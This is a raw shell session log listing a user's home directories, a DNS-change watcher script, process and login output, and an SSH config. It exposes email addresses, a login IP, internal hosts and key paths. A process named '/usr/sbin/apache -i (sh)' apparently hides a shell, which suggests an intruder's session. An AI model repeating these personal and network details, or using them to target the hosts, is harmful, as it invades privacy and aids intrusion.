-rw-r--r--    1 thalakan  thalakan         476 Mar 13  2006 test.o
-rw-r--r--    1 thalakan  thalakan           8 Mar 20  2007 test.p
-rw-r--r--    1 thalakan  thalakan          30 Apr 22  2008 test.php
-rwxr-xr-x    1 thalakan  thalakan         396 Nov 24  2004 test.pl
-rw-r--r--    1 thalakan  thalakan         123 Nov 24  2004 test.pl~
-rwxr-xr-x    1 thalakan  thalakan          82 May  5  2006 test.py
-rw-r--r--    1 thalakan  thalakan          65 Mar 13  2006 test.s
-rw-r--r--    1 thalakan  thalakan          71 Sep 18  2004 test.sh
-rw-r--r--    1 thalakan  thalakan       10240 Dec 12  2004 test.tar
-rw-r--r--    1 thalakan  thalakan        1856 Dec 12  2004 test.tar.gz
-rw-r--r--    1 thalakan  thalakan          19 Aug 20  2008 test.tcl
-rw-r--r--    1 thalakan  thalakan          31 Aug 27  2004 test.txt
-rwxr-xr-x    1 thalakan  thalakan        5214 Aug 26  2004 test1
-rw-r--r--    1 thalakan  thalakan        2095 Aug 26  2004 test1.c
-rw-r--r--    1 thalakan  thalakan        4174 Dec  6  2004 test1.c.html
-rw-r--r--    1 thalakan  thalakan         757 Aug 26  2004 test1.c~
-rwxr-xr-x    1 thalakan  thalakan         292 Sep  3  2005 test1.scm
-rw-r--r--    1 thalakan  thalakan          64 Sep  3  2005 test1.scm~
-rwxr-xr-x    1 thalakan  thalakan        7577 Dec 10  2004 test10
-rw-r--r--    1 thalakan  thalakan          77 Dec 10  2004 test10.c
-rw-r--r--    1 thalakan  thalakan          77 Dec 10  2004 test10.c~
-rwxr-xr-x    1 thalakan  thalakan        7348 Jan 25  2005 test11
-rw-r--r--    1 thalakan  thalakan         212 Jan 25  2005 test11.c
-rw-r--r--    1 thalakan  thalakan         165 Jan 25  2005 test11.c~
-rw-r--r--    1 thalakan  thalakan         844 May 17 21:04 test11.o
-rwxr-xr-x    1 thalakan  thalakan        7687 Feb 14  2005 test12
-rw-r--r--    1 thalakan  thalakan         233 Feb 14  2005 test12.c
-rw-r--r--    1 thalakan  thalakan         232 Feb 14  2005 test12.c~
-rwxr-xr-x    1 thalakan  thalakan        8099 Apr  6  2005 test13
-rw-r--r--    1 thalakan  thalakan         435 Apr  6  2005 test13.c
-rw-r--r--    1 thalakan  thalakan        4544 Apr  6  2005 test13.o
-rw-r--r--    1 thalakan  thalakan        1470 Apr  9  2006 test13.s
-rwxr-xr-x    1 thalakan  thalakan        4813 Jul 14  2005 test14
-rw-r--r--    1 thalakan  thalakan         450 Jul 14  2005 test14.c
-rwxr-xr-x    1 thalakan  thalakan        4565 Jul 21  2005 test15
-rw-r--r--    1 thalakan  thalakan         466 Jul 21  2005 test15.c
-rw-r--r--    1 thalakan  thalakan         160 Jul 21  2005 test15.c~
-rw-r--r--    1 thalakan  thalakan         371 Aug 22  2005 test16-b.o
-rw-r--r--    1 thalakan  thalakan          50 Aug 22  2005 test16.c
-rw-r--r--    1 thalakan  thalakan         735 Aug 22  2005 test16.o
-rwxr-xr-x    1 thalakan  thalakan        4320 Dec 28  2005 test17
-rw-r--r--    1 thalakan  thalakan         153 Dec 28  2005 test17.c
-rwxr-xr-x    1 thalakan  thalakan        4284 Apr  2  2006 test18
-rw-r--r--    1 thalakan  thalakan          65 Apr  2  2006 test18.c
-rw-r--r--    1 thalakan  thalakan          80 Apr  2  2006 test18.c~
-rwxr-xr-x    1 thalakan  thalakan         375 Apr  9  2006 test18.s
-rw-r--r--    1 thalakan  thalakan          36 Feb 16  2006 test19.c
-rw-r--r--    1 thalakan  thalakan          36 Feb 16  2006 test19.c~
-rw-r--r--    1 thalakan  thalakan         685 Mar 30  2006 test19.o
-rwxr-xr-x    1 thalakan  thalakan        4904 Jun 20  2002 test2
-rw-r--r--    1 thalakan  thalakan         921 Jun 20  2002 test2.c
-rw-r--r--    1 thalakan  thalakan        2032 Dec  6  2004 test2.c.html
-rw-r--r--    1 thalakan  thalakan         422 Apr  8  2002 test2.cpp
-rw-r--r--    1 thalakan  thalakan         479 Apr  9  2006 test2.o
-rw-r--r--    1 thalakan  thalakan         252 Nov 28  2006 test2.pl
-rw-r--r--    1 thalakan  thalakan         252 Nov 27  2006 test2.pl~
-rw-r--r--    1 thalakan  thalakan         115 Apr 10  2008 test2.py
-rw-r--r--    1 thalakan  thalakan         149 Apr  9  2006 test2.s
-rwxr-xr-x    1 thalakan  thalakan          18 Apr 25  2005 test2.sh
-rw-r--r--    1 thalakan  thalakan        2557 Dec 12  2004 test2.tar.gz
-rw-r--r--    1 thalakan  thalakan          66 Apr  4  2006 test20.c
-rw-r--r--    1 thalakan  thalakan         732 Apr  4  2006 test20.obj
-rwxr-xr-x    1 thalakan  thalakan        4342 Apr  9  2006 test21
-rw-r--r--    1 thalakan  thalakan         148 Apr  9  2006 test21.c
-rw-r--r--    1 thalakan  thalakan         936 Apr  9  2006 test21.o
-rwxr-xr-x    1 thalakan  thalakan        4352 May  3  2006 test22
-rw-r--r--    1 thalakan  thalakan         204 May  3  2006 test22.c
-rw-r--r--    1 thalakan  thalakan          90 May  3  2006 test22.c~
-rw-r--r--    1 thalakan  thalakan        1658 May  3  2006 test22_1
-rw-r--r--    1 thalakan  thalakan        1672 May  3  2006 test22_2
-rwxr-xr-x    1 thalakan  thalakan        7172 May 13  2006 test23
-rw-r--r--    1 thalakan  thalakan         149 May 13  2006 test23.c
-rwxr-xr-x    1 thalakan  thalakan        5012 Jun  1  2006 test24
-rw-r--r--    1 thalakan  thalakan         629 Jun  1  2006 test24.c
-rwxr-xr-x    1 thalakan  thalakan        4185 May  7  2007 test25
-rw-r--r--    1 thalakan  thalakan         257 May  7  2007 test25.c
-rwxr-xr-x    1 thalakan  thalakan        7080 Aug 17  2008 test26
-rw-r--r--    1 thalakan  thalakan        3838 Aug 17  2008 test26.c
-rw-------    1 thalakan  thalakan        3614 Aug 17  2008 test26.c.BAK
-rw-r--r--    1 thalakan  thalakan        3754 Aug 17  2008 test26.c~
-rwxr-xr-x    1 thalakan  thalakan        4739 Sep 30  2008 test27
-rw-r--r--    1 thalakan  thalakan          88 Sep 30  2008 test27.c
-rwxr-xr-x    1 thalakan  thalakan        7152 May 13  2006 test3
-rw-r--r--    1 thalakan  thalakan         160 Nov 21  2005 test3.c
-rw-r--r--    1 thalakan  thalakan        3848 May 13  2006 test3.o
-rw-r--r--    1 thalakan  thalakan         401 Jan 15  2009 test3.pl
-rw-r--r--    1 thalakan  thalakan          72 Apr 10  2008 test3.py
-rwxr-xr-x    1 thalakan  thalakan          89 Mar 13  2006 test3.sh
-rwxr-xr-x    1 thalakan  thalakan        4475 Jul  6  2003 test4
-rw-r--r--    1 thalakan  thalakan          84 Jul  6  2003 test4.c
-rw-r--r--    1 thalakan  thalakan         696 Jan 15  2009 test4.pl
-rw-r--r--    1 thalakan  thalakan          22 Nov  7  2008 test4.py
-rwxr-xr-x    1 thalakan  thalakan         138 Apr 20  2007 test4.sh
-rw-r--r--    1 thalakan  thalakan         663 Nov  9  2004 test5-a.c
-rw-r--r--    1 thalakan  thalakan          76 Nov  9  2004 test5-a.c~
-rw-r--r--    1 thalakan  thalakan        3049 Nov  9  2004 test5-a.o
-rw-r--r--    1 thalakan  thalakan         321 Nov  9  2004 test5-b.c
-rw-r--r--    1 thalakan  thalakan         301 Nov  9  2004 test5-b.c~
-rw-r--r--    1 thalakan  thalakan        2638 Nov  9  2004 test5-b.o
-rw-r--r--    1 thalakan  thalakan        4893 Nov  9  2004 test5-new.o
-rw-r--r--    1 thalakan  thalakan        5585 Jul 12  2005 test5.asm
-rw-r--r--    1 thalakan  thalakan         969 Nov  9  2004 test5.c
-rw-r--r--    1 thalakan  thalakan        1294 Nov  8  2004 test5.c~
-rw-r--r--    1 thalakan  thalakan         390 Nov  9  2004 test5.h
-rw-r--r--    1 thalakan  thalakan         383 Nov  9  2004 test5.h~
-rw-r--r--    1 thalakan  thalakan        2064 Jul 12  2005 test5.o
-rwxr-xr-x    1 thalakan  thalakan         273 Dec 11  2008 test5.sh
-rwxr-xr-x    1 thalakan  thalakan         134 Dec 11  2008 test5.sh~
-rwxr-xr-x    1 thalakan  thalakan        4480 Feb 10  2004 test6
-rw-r--r--    1 thalakan  thalakan         159 Feb 10  2004 test6.c
-rwxr-xr-x    1 thalakan  thalakan         393 Jan 17  2009 test6.sh
-rwxr-xr-x    1 thalakan  thalakan         292 Jan 16  2009 test6.sh~
-rwxr-xr-x    1 thalakan  thalakan        7536 Oct 20  2004 test7
-rw-r--r--    1 thalakan  thalakan         303 Oct 20  2004 test7.c
-rw-r--r--    1 thalakan  thalakan         296 Oct 20  2004 test7.c~
-rwxr-xr-x    1 thalakan  thalakan        4383 Nov  2  2004 test8
-rw-r--r--    1 thalakan  thalakan         108 Nov  2  2004 test8.c
-rw-r--r--    1 thalakan  thalakan        1025 Aug  9  2002 test8.txt
-rwxr-xr-x    1 thalakan  thalakan        4602 Nov 21  2004 test9
-rw-r--r--    1 thalakan  thalakan         504 Nov 21  2004 test9.c
-rw-r--r--    1 thalakan  thalakan         498 Nov 21  2004 test9.c~
-rw-r--r--    1 thalakan  thalakan           6 Apr 18  2006 testbin
-rw-r--r--    1 thalakan  thalakan          12 Apr 18  2006 testbin2
-rwxr-xr-x    1 thalakan  thalakan         909 Dec  3  2008 testread.py
-rwxr-xr-x    1 thalakan  thalakan         482 Dec  3  2008 testread.py~
-rw-------    1 thalakan  thalakan        3786 Feb 18  2002 testspec3.txt
-rw-r--r--    1 thalakan  thalakan           0 Aug 13  2004 textfile0
-rw-r--r--    1 thalakan  thalakan         618 Aug 13  2004 textfile1
-rw-r--r--    1 thalakan  thalakan           0 Aug 13  2004 textfile2
-rw-r--r--    1 thalakan  thalakan       10931 Nov 16  2008 timeline-api.js
-rw-r--r--    1 thalakan  thalakan      103477 Jan 27 18:14 timeline-bundle.js
-rw-------    1 thalakan  thalakan       90380 Jan 27 18:14 timeline-bundle.js.BAK
drwx------    2 thalakan  thalakan         512 Feb 14  2008 timtest
drwxr-xr-x    2 thalakan  thalakan         512 Aug 16  2006 tmp
drwxr-xr-x    2 thalakan  thalakan         512 Nov  9  2006 tokens
drwxr-xr-x    3 thalakan  thalakan         512 May 17 21:07 toyos
-rw-r--r--    1 thalakan  thalakan         421 Oct 30  2005 tree.c
-rw-r--r--    1 thalakan  thalakan          39 Dec 12  2004 trg
-rwxr-xr-x    1 thalakan  thalakan     4935944 Jan 24  2002 tribes2d
-rwxr-xr-x    1 thalakan  thalakan         818 Dec 31  2004 tunnel.pl
-rw-r--r--    1 thalakan  thalakan         578 Jan 12  2005 tunnel.sh
drwxr-xr-x    2 thalakan  thalakan         512 Apr 26  2008 turbopony
-rw-r--r--    1 thalakan  thalakan      126726 Nov  9  2002 uc2.rtf
-rw-r--r--    1 thalakan  thalakan       59078 Nov 13  2002 uc3.pdf
-rw-r--r--    1 thalakan  thalakan        1718 Oct 30  2006 ucb-systems.txt
-rw-r--r--    1 thalakan  thalakan    97340565 Oct 10  2005 ucb-wlan-cap.tar.gz
-rw-r--r--    1 thalakan  thalakan       10351 Apr  6  2003 uml2.jpg
-rwx------    1 thalakan  thalakan   105699476 Mar 21  2005 unicode.tif
-rw-r--r--    1 thalakan  thalakan     2359350 Nov 24  2004 untitled.bmp
-rw-r--r--    1 thalakan  thalakan          16 Nov 15  2007 urls.txt
-rw-r--r--    1 thalakan  thalakan         343 Oct  1  2007 usleep.c
-rwxr-xr--    1 thalakan  thalakan      686080 Apr 11  2006 v8.ppt
-rw-r--r--    1 thalakan  thalakan       29889 May 13  2002 velocitusspec.rtf
drwxr-xr-x    2 thalakan  thalakan         512 Aug  7  2002 via.net
drwxr-xr-x    2 thalakan  thalakan         512 Jan 24  2002 vid-1.0.1
-rw-r--r--    1 thalakan  thalakan       13986 Jan 24  2002 vid-1.0.1.tar.gz
-rwxr-xr-x    1 thalakan  thalakan        8102 Mar 30  2006 virus
-rw-r--r--    1 thalakan  thalakan        3092 Mar 30  2006 virus.c
-rw-r--r--    1 thalakan  thalakan        3094 Mar 30  2006 virus.c~
-rwxr-xr-x    1 thalakan  thalakan      657580 Mar 31  2006 vmkfstools
-rw-r--r--    1 thalakan  thalakan         290 Feb 15 02:55 vmware-notes.txt
-rw-r--r--    1 thalakan  thalakan       20784 Jul 22  2002 voip-diagram.png
-rwxr-xr-x    1 thalakan  thalakan        1252 Apr  8  2002 vpb
-rw-r--r--    1 thalakan  thalakan        2110 Apr  8  2002 vpb-session
-rwxr-xr-x    1 thalakan  thalakan     1076976 Feb 20  2002 vpb.ivr
-rw-r--r--    1 thalakan  thalakan        2367 Jul  3  2002 vpb.spec
-rw-------    1 thalakan  thalakan       24319 Aug 13  2002 vpbdial.cpp
-rw-------    1 thalakan  thalakan      144316 May 30  2002 vpbmain_pci.out
-rw-r--r--    1 thalakan  thalakan        9385 Apr 25  2002 vpbtester.cpp
drwxr-xr-x    3 thalakan  thalakan         512 Dec  3  2008 vpon
-rwxr-xr-x    1 thalakan  thalakan        5805 Apr 11  2003 vvfreebsd
-rw-r--r--    1 thalakan  thalakan        1461 Apr 11  2003 vvfreebsd.c
-rwxr-xr-x    1 thalakan  thalakan         521 Jun 17 11:22 watcher.pl
-rwxr-xr-x    1 thalakan  thalakan         335 Sep  6  2002 watcher.pl~
-rw-r--r--    1 thalakan  thalakan      243038 Apr  3  2007 wep-crack.pdf
-rw-r--r--    1 thalakan  thalakan      610988 Mar  7  2003 wget-log
-rw-r--r--    1 thalakan  thalakan      187165 Oct  2  2005 wget-log.1
-rw-r--r--    1 thalakan  thalakan      649181 Oct  2  2005 wget-log.2
-rw-r--r--    1 thalakan  thalakan        1612 Jan 31 15:55 wget.log
-rwxr-xr-x    1 thalakan  thalakan        8918 Dec 28  2008 whetstone
-rw-r--r--    1 thalakan  thalakan        8121 Mar 22  1998 whetstone.c
drwxr-xr-x   11 thalakan  thalakan         512 Jul  3  2007 wicrawl
-rw-------    1 thalakan  thalakan        7764 Nov 19  2005 wicrawl.txt
-rwxr--r--    1 thalakan  thalakan         621 Nov 20  2004 win32align.c
-rwxr--r--    1 thalakan  thalakan         620 Nov 20  2004 win32align.c~
-rw-------    1 thalakan  thalakan     1474560 Jul 24  2002 win98bd.img
-rw-r--r--    1 thalakan  thalakan        3334 Feb  3 23:25 windbg-notes.txt
-rw-r--r--    1 thalakan  thalakan         534 Feb  3 21:34 windbg-notes.txt~
drwxr-xr-x    5 thalakan  thalakan         512 Apr  8  2003 woody
-rw-r--r--    1 thalakan  thalakan      223811 Jan  6  2005 worst.jpg
-rw-r--r--    1 thalakan  thalakan          37 Aug 30  2003 wow.txt
-rwxr--r--    1 thalakan  thalakan        4608 Feb  7  2003 writer.exe
-rw-r--r--    1 thalakan  thalakan       18054 Jan 19  2005 wrong2.bmp
drwxr-xr-x    2 thalakan  thalakan         512 Sep  5  2008 wtf
-rw-r--r--    1 thalakan  thalakan       19360 Dec 11  2007 wtf.tar.gz
-rwxr-xr-x    1 thalakan  thalakan       13040 Nov  1  2004 wtmpdump
-rw-r--r--    1 thalakan  thalakan        1643 Nov  1  2004 wtmpdump.c~
-rw-r--r--    1 thalakan  thalakan          21 Apr 11  2003 wurd
drwxr-xr-x    3 thalakan  thalakan         512 Jun  1  2007 www.kenshoto.com
-rw-r--r--    1 thalakan  thalakan        1171 Nov 20  2004 x11-keylogger.c
-rwxr-xr-x    1 thalakan  thalakan         166 Jul 29  2005 xor.pl
-rw-r--r--    1 thalakan  thalakan         314 Jan 26  2005 xvnc.sh
-rwxr-xr-x    1 thalakan  thalakan        4610 Jan  5  2006 zeller
-rw-r--r--    1 thalakan  thalakan         386 Jan  5  2006 zeller.c
drwxr-xr-x    2 thalakan  thalakan         512 Jun 22  2006 かたかã�ls
$ cat watcher.pl
#!/usr/bin/perl -w
use Mail::Sendmail;

my %mail = (to => 'jrspence@gmail.com',
	    from => 'jspence@lightconsulting.com',
	    subject => 'Zone updated',
            message => "");

$command = 'dig +nssearch gs | awk \'{ print $4 }\' | sort | uniq -c';

$last = `$command`;

while(1) {
	#`ping -c 1 graendal.lightconsulting.com`;
	#if(($? >> 8) == 0) {
	#}

	$result = `$command`;
	if($result ne $last) {
		print "$result\n";
		$mail{message} = $result;
		sendmail(%mail);
		exit(0);
	}
	$last = $result;
	sleep(5);
}
$ ps ax
  PID  TT  STAT      TIME COMMAND
96798  ??  SJ     0:01.07 /usr/local/sbin/httpd -k start
96880  ??  IJ     0:01.08 /usr/local/sbin/httpd -k start
96938  ??  SsJ    0:00.02 /usr/sbin/apache -i (sh)
97180  ??  SJ     0:00.86 /usr/local/sbin/httpd -k start
97193  ??  SJ     0:00.88 /usr/local/sbin/httpd -k start
97200  ??  SJ     0:00.97 /usr/local/sbin/httpd -k start
97205  ??  SJ     0:00.89 /usr/local/sbin/httpd -k start
97206  ??  IJ     0:00.43 /usr/local/sbin/httpd -k start
97210  ??  SJ     0:00.86 /usr/local/sbin/httpd -k start
97224  ??  IJ     0:00.10 /usr/local/sbin/httpd -k start
97228  ??  SJ     0:00.25 /usr/local/sbin/httpd -k start
97244  ??  SJ     0:00.32 /usr/local/sbin/httpd -k start
97245  ??  SJ     0:01.20 /usr/local/sbin/httpd -k start
97255  ??  SJ     0:00.48 /usr/local/sbin/httpd -k start
97297  ??  RJ     0:00.00 ps ax
$ w
 9:19AM  up 544 days, 21:02, 1 user, load averages: 0.23, 0.27, 0.30
USER             TTY      FROM              LOGIN@  IDLE WHAT
thalakan         q5       98.210.123.132:S 16Jan09 33days -
$ cd /home/thalakan/jrstools
$ ls -al
total 638
-rw-r--r--    1 thalakan  thalakan   3564 Jan 27 15:47 #dot-emacs#
drwxr-xr-x    3 thalakan  thalakan   3584 Jul  6 15:00 .
lrwxr-xr-x    1 thalakan  thalakan     54 Jan 16  2009 .#dot-emacs -> thalakan@shaitan1.lightconsulting.com.16643:1201029436
-rw-r--r--    1 thalakan  thalakan   2360 Aug 29  2002 .#dot-emacs.1.11
-rw-r--r--    1 thalakan  thalakan   1731 Feb  4  2002 .#dot-emacs.1.8
-rw-r--r--    1 thalakan  thalakan   1893 Feb  5  2002 .#dot-emacs.1.9
-rwxr-xr-x    1 thalakan  thalakan   1305 Jan  3  2009 .#hgrep.rb.1.1
-rwxr-xr-x    1 thalakan  thalakan   1946 Sep 14  2002 .#nagios-pather.pl.1.1
-rw-r--r--    1 thalakan  thalakan    432 Feb  1  2006 .#ssh-config.1.16
-rwxr-xr-x    1 thalakan  thalakan    177 Sep 15  2007 .#tools-setup.sh.1.1
-rwxr-xr-x    1 thalakan  thalakan   2265 Aug 13  2006 .#whereami.pl.1.5
drwxr-x---  141 thalakan  thalakan  26112 Jul 20 09:33 ..
-rw-r--r--    1 thalakan  thalakan    572 Apr 16 19:01 15.log
-rw-r--r--    1 thalakan  thalakan    138 Apr 16 18:07 15.log~
-rwxr-xr-x    1 thalakan  thalakan    171 Dec  4  2008 4pics.sh
-rwxr-xr-x    1 thalakan  thalakan   1673 Feb  3 18:45 4urls.sh
-rwxr-xr-x    1 thalakan  thalakan    859 Dec  4  2008 4urls.sh.~1.1.~
drwxr-xr-x    2 thalakan  thalakan    512 Jul  6 15:00 CVS
-rw-r--r--    1 thalakan  thalakan    147 Jun  4 03:44 Makefile
-rwxr-xr-x    1 thalakan  thalakan    740 Aug 19  2008 add-auto-cmd.sh
-rw-------    1 thalakan  thalakan      0 Apr 22  2008 addr-server
-rwxr-xr-x    1 thalakan  thalakan    551 Apr 22  2008 addr-server.sh
-rw-r--r--    1 thalakan  thalakan   1004 Apr 28  2008 addresses
-rwxr-xr-x    1 thalakan  thalakan    531 Apr 22  2008 bob
-rw-r--r--    1 thalakan  thalakan   3730 Jun  4 03:44 bso.c
-rwxr-xr-x    1 thalakan  thalakan    868 Jan 24  2002 check-links.pl
-rw-r--r--    1 thalakan  thalakan    503 Jan 26 20:53 check.c
-rwxr-xr-x    1 thalakan  thalakan    367 Apr 22  2008 chkmonitor.sh
-rwxr-xr-x    1 thalakan  thalakan   2022 Jun 20 16:31 clil.sh
-rw-r--r--    1 thalakan  thalakan   7798 Apr 26 22:24 cmake-mode.el
-rwxr-xr-x    1 thalakan  thalakan    340 Apr 13  2007 cmdwatch.sh
-rw-r--r--    1 thalakan  thalakan    224 Apr 30 14:55 common-checklist.txt
-rw-r--r--    1 thalakan  thalakan    138 Jan 24  2006 common-checklist.txt.~1.1.~
-rw-r--r--    1 thalakan  thalakan    148 Feb  8 15:23 common-user-checklist.txt
-rw-r--r--    1 thalakan  thalakan  13840 Aug 11  2008 cycle.h
-rwxr-xr-x    1 thalakan  thalakan    509 Jan 26 20:41 doorcheck.sh
-rw-r--r--    1 thalakan  thalakan    567 Apr 26  2008 dot-bashrc-local
-rw-r--r--    1 thalakan  thalakan   3732 Jun 23 22:21 dot-emacs
-rw-r--r--    1 thalakan  thalakan    197 Jan 31 17:57 dot-exrc
-rw-r--r--    1 thalakan  thalakan     28 Feb  8 15:23 dot-forward
-rw-r--r--    1 thalakan  thalakan  10798 Jul  7 19:08 dot-irssi-config
-rw-r-----    1 thalakan  thalakan  10084 Dec  4  2008 dot-irssi-config-new
-rw-r--r--    1 thalakan  thalakan  10411 Dec  4  2008 dot-irssi-config.~1.7.~
-rw-r--r--    1 thalakan  thalakan  10411 Dec  4  2008 dot-irssi-config~
-rw-r--r--    1 thalakan  thalakan  15886 Jun 23 22:23 dot-muttrc
-rw-r--r--    1 thalakan  thalakan   4941 Nov  2  2007 dot-procmailrc
-rw-r--r--    1 thalakan  thalakan    419 Jul  6 15:00 dot-profile
-rw-r--r--    1 thalakan  thalakan    132 Jan 31 17:57 dot-screenrc
-rw-r--r--    1 thalakan  thalakan   1113 Jun 23 22:21 dot-ssh-config
-rwxr-xr-x    1 thalakan  thalakan   3005 Feb 20  2007 dot-tcshrc
-rwxr-xr-x    1 thalakan  thalakan    724 May  1  2008 dpkg-dump.sh
-rwxr-xr-x    1 thalakan  thalakan   1333 Nov  7  2002 dumppkg.pl
-rw-r--r--    1 thalakan  thalakan     50 Mar  2  2002 eterm-user-cfg
-rwxr-xr-x    1 thalakan  thalakan    327 Jun  1 12:46 extract-cpio.sh
-rwxr-xr-x    1 thalakan  thalakan    309 Jan 24  2002 fix-xauth
-rw-r--r--    1 thalakan  thalakan    154 Jan 24  2006 freebsd-checklist.txt
-rwxr-xr-x    1 thalakan  thalakan     36 Apr 26  2008 get-gcc-defines.sh
-rwxr-xr-x    1 thalakan  thalakan    817 Aug 13  2006 getcoords.pl
-rwxr-xr-x    1 thalakan  thalakan    602 Oct 10  2003 getcoords.pl~
-rwxr-xr-x    1 thalakan  thalakan    216 Apr 22  2008 getip.sh
-rw-r--r--    1 thalakan  thalakan    327 Jan  3  2009 getthreads.sh
-rw-r--r--    1 thalakan  thalakan    117 Jan  3  2009 getthreads.sh~
-rw-r--r--    1 thalakan  thalakan     16 Jun 17  2008 gitrepos.conf
-rw-r--r--    1 thalakan  thalakan    713 Oct  6  2007 hexdump.c
-rwxr-xr-x    1 thalakan  thalakan   1352 Jan 16  2009 hgrep.rb
-rwxr-xr-x    1 thalakan  thalakan   1260 Dec  1  2008 hgrep.rb.~1.1.~
-rwxr-xr-x    1 thalakan  thalakan   1214 Dec  1  2008 hgrep.rb~
-rw-r--r--    1 thalakan  thalakan      0 Sep 14  2002 hostgroups.cfg
-rw-r--r--    1 thalakan  thalakan  63321 Sep  6  2003 hosts.cfg
-rw-r--r--    1 thalakan  thalakan   1906 Feb 23  2003 hosts.txt
-rw-r--r--    1 thalakan  thalakan  58149 Oct 22  2003 htmlize.el
-rwxr-xr-x    1 thalakan  thalakan   2512 Jun 19  2002 image2ascii
-rwxr-xr-x    1 thalakan  thalakan    564 Jan 27 17:26 indexer.pl
-rwxr-xr-x    1 thalakan  thalakan   1091 Jan 24  2002 install-febo-kernel
-rwxr-xr-x    1 thalakan  thalakan    917 Jan 24  2002 install-local-kernel
-rwxr-xr-x    1 thalakan  thalakan   1266 Jan 24  2002 install-netboot-kernel
-rwxr-xr-x    1 thalakan  thalakan   1785 Feb 23  2003 listhosts.pl
-rwxr-xr-x    1 thalakan  thalakan   4329 Feb 23  2003 listhosts.pl~
-rwxr-xr-x    1 thalakan  thalakan   1384 Jan 24  2002 lizard-sucker.pl
-rwxr-xr-x    1 thalakan  thalakan    574 Jun  1 12:46 make-cpio.sh
-rwxr-xr-x    1 thalakan  thalakan   1203 Apr  2  2002 megadiff
-rwxr-xr-x    1 thalakan  thalakan    376 Apr 26  2008 mkelf.sh
-rwxr-xr-x    1 thalakan  thalakan   4743 Feb 20  2007 mkregs.pl
-rwxr-xr-x    1 thalakan  thalakan   2427 Jul  6 15:00 monitor.sh
-rwxr-xr-x    1 thalakan  thalakan    830 Jun 19  2002 mutt_add.pl
-rwxr-xr-x    1 thalakan  thalakan    587 Jun 19  2002 mutt_query.pl
-rwxr-xr-x    1 thalakan  thalakan   4329 Sep 14  2002 nagios-pather.pl
-rw-r--r--    1 thalakan  thalakan    273 Jun 19 13:22 ndiff.cron
-rwxr-xr-x    1 thalakan  thalakan   1179 Sep 20  2004 newpicture.sh
-rwxr-xr-x    1 thalakan  thalakan    468 May 26 12:42 oop-files
-rw-r--r--    1 thalakan  thalakan    351 May 26 12:42 oop-files-ignored
-rwxr-xr-x    1 thalakan  thalakan    218 May 26 12:42 oop-files.sh
-rwxr-xr-x    1 thalakan  thalakan    304 Feb  8 15:23 opcode-histo.sh
-rw-r--r--    1 thalakan  thalakan    845 Sep 14  2002 out
-rwxr-xr-x    1 thalakan  thalakan     90 Jun  1 12:46 patch-initrd.sh
-rwxr-xr-x    1 thalakan  thalakan     83 Apr 28  2008 pingall.sh
-rwxr-xr-x    1 thalakan  thalakan    427 Aug 19  2008 plotit.sh
-rwxr-xr-x    1 thalakan  thalakan   7935 Apr  4 17:06 portability
-rwxr-xr-x    1 thalakan  thalakan   4208 Apr  4 17:06 portability.c
-rwxr-xr-x    1 thalakan  thalakan    308 Apr 22  2008 putkey.sh
-rw-r--r--    1 thalakan  thalakan  39854 Apr 28  2008 results.lis
-rw-r--r--    1 thalakan  thalakan  41286 Sep  6  2003 services.cfg
-rwxr-xr-x    1 thalakan  thalakan    685 Sep 12  2002 sig.pl
-rwxr-xr-x    1 thalakan  thalakan    110 Sep 14  2002 snmpscan.sh
-rw-r--r--    1 thalakan  thalakan    437 Apr 18 23:11 ssh-config
-rw-r--r--    1 thalakan  thalakan    357 Jan 27 23:05 ssh-config~
-rwxr-xr-x    1 thalakan  thalakan   1306 Apr 22  2008 ssh-copy-id
-rw-r--r--    1 thalakan  thalakan   1968 Jun 19  2002 ssh-ppp
-rwxr-xr-x    1 thalakan  thalakan   1561 Feb 14  2007 supertr.pl
-rwxr-xr-x    1 thalakan  thalakan     81 Jun 26 07:19 t.sh
-rwxr-xr-x    1 thalakan  thalakan   1322 Jan 24  2002 template.pl
-rw-r--r--    1 thalakan  thalakan   4448 Dec 13  2006 template_rc.c
-rwxr-xr-x    1 thalakan  thalakan    143 Sep 14  2002 test.pl
-rw-r--r--    1 thalakan  thalakan    120 Sep 14  2002 test.pl~
-rw-r--r--    1 thalakan  thalakan   1443 May 26 12:43 timeline.html
-rwxr-xr-x    1 thalakan  thalakan    134 Apr 18  2007 title.sh
-rwxr-xr-x    1 thalakan  thalakan     24 Apr 18  2007 title.sh~
-rwxr-xr-x    1 thalakan  thalakan    690 Jul  6 15:00 tools-setup.sh
-rw-r--r--    1 thalakan  thalakan    168 Jun 26 07:19 tunnel-config
-rw-r--r--    1 thalakan  thalakan    668 Jun 26 07:19 tunnel-key
-rwxr-xr-x    1 thalakan  thalakan    184 Apr 24  2007 un-nastify
-rwxr-xr-x    1 thalakan  thalakan    495 Apr 26  2008 update-address-db.sh
-rwxr-xr-x    1 thalakan  thalakan    235 Jun  4 03:44 update-geoip.sh
-rwxr-xr-x    1 thalakan  thalakan    312 Jun 17  2008 update-linux-2.6.sh
-rwxr-xr-x    1 thalakan  thalakan   1773 Jul  1  2002 varnish
-rwxr-xr-x    1 thalakan  thalakan   2554 Jun 19  2002 view-x-face
-rw-r--r--    1 thalakan  thalakan   1647 Feb 20  2007 vsnprintf_loop.h
-rwxr-xr-x    1 thalakan  thalakan   2710 Mar  1  2007 whereami.pl
-rwxr-xr-x    1 thalakan  thalakan    867 Sep 12  2002 whereami.pl~
-rw-r--r--    1 thalakan  thalakan   1956 Jun 23 22:21 wic-cdma-status.shtml
-rw-r--r--    1 thalakan  thalakan    808 Apr 16 16:27 windows-checklist.txt
-rw-r--r--    1 thalakan  thalakan    216 Apr 10 15:35 windows-checklist.txt~
-rwxr-xr-x    1 thalakan  thalakan    302 Dec  3  2004 wwwusage.sh
-rwxr-xr-x    1 thalakan  thalakan  33323 Jan 24  2002 x2x
-rwxr-xr-x    1 thalakan  thalakan    323 Jun 19  2002 x2xdm
-rwxr-xr-x    1 thalakan  thalakan    264 Jun 19  2002 xmms.pl
$ cat dot-ssh-config
IdentityFile /home/thalakan/.ssh/id_dsa

Cipher Blowfish

Protocol 2,1

KeepAlive yes

Host *
        ControlMaster auto
        ControlPath /tmp/ssh-jspence/%r@%h:%p


Host server1
	User jspence
	HostName server1.t34m1337.com

Host server2
	User jspence
	HostName server2.t34m1337.com
	LocalForward 28799 localhost:28799

Host ol5
	User jason.spence
	IdentityFile ~/.ssh/id_dsa_rearden

Host shell01
	User jason.spence

Host hc-dev1
	User jason.spence
	HostName 172.18.66.203
	IdentityFile ~/.ssh/id_dsa_rearden

Host midnightresearch.com
        Port 222
        IdentityFile ~/.ssh/mrl-chroot

Host shaitan.lightconsulting.com
	User thalakan
	LocalForward 1143 localhost:143
	LocalForward 1025 localhost:1025
	LocalForward 5900 localhost:5900

